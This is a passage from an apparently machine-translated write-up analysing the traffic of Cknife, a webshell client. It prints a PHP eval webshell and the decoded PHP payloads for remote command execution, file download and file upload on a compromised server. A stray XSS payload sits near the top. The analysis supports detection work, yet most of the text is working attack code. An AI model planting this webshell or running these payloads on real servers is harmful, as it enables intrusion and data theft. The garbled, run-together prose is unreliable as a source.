Cknife traffic analysis

This article first: https: // <img src = 1 onerror = \ u006coc \ u0061tion = 'j \ x61v \ x61script: \ x61lert \ x281 \ x29'> testdemo

0x01 environment

<?php eval($_REQUEST['shell'] ?>

0x02 command execution

Run results are shown in FIG.

POST data shown below

Decoding data of the POST

#shell
@eval(base64_decode($_POST[action]));

#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
@system($r." 2>&1",$ret);
print ($ret!=0)?"ret={$ret}":"";;
echo("|<-");
die();

#z1
cmd

#z2
cd/d"C:\wamp64\www\"&whoami&echo [S]&cd&echo [E]

z2It is whoamithrough the cknifecombination and then passes base64the result of the coding, cknifeby evalexecuting actionthe code in the POST's z1and z2by base64_decodedecoding, then z1, and z2combined into $r, and finally systemexecute $r, print the result.

Return the results as shown in FIG.

After cknifethe format process, make the result a figure like, ->|and |<-the result is the contents of intermediate Run

0x03 Download

POST data shown below

Decoding data of the POST

#shell
@eval(base64_decode($_POST[action]));

#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$F=get_magic_quotes_gpc()?base64_decode(stripslashes($_POST["z1"])):base64_decode($_POST["z1"]);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
    @fclose($fp);
    @readfile($F);
}else
{
    echo("ERROR:// Can Not Read");
};
echo("|<-");
die();

#z1
C:\wamp64\www\index.php

z1Target file path is through base64the result of coding, cknifeby evalexecuting actioncode, by base64_decodethe path of the acquired file, and whether the file can be read, if it can be read, with the readfile()contents of the output file, and finally the contents of the file output write to a local file.

Return the results as shown in FIG.

It is important to note that cknifeall of the content might return the output to a file, you need to manually remove ->|and |<-content between, otherwise the file may be malformed

0x04 file upload

POST data shown below

Decoding data of the POST

#shell
@eval(base64_decode($_POST[action]));

#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");
die();

#z1
C:\wamp64\www\test.txt

#z2
this is a test

z1Target file path through the base64result of the coding, z2the contents of the local file after hexthe result of the coding, cknifeby evalexecuting actioncode using base64_decodeacquired target file to the path, and then acquiring z2the content, the use of forcirculating the original hextranscoding is URLencoded, and then urldecodedecodes additional to $buf, forthe end of the cycle $bufis the contents of the file, and finally written to the target file, write successful return 1, the write fails to return0

Return the results as shown in FIG.

If ->|and |<-content is between 1, it represents a successful file upload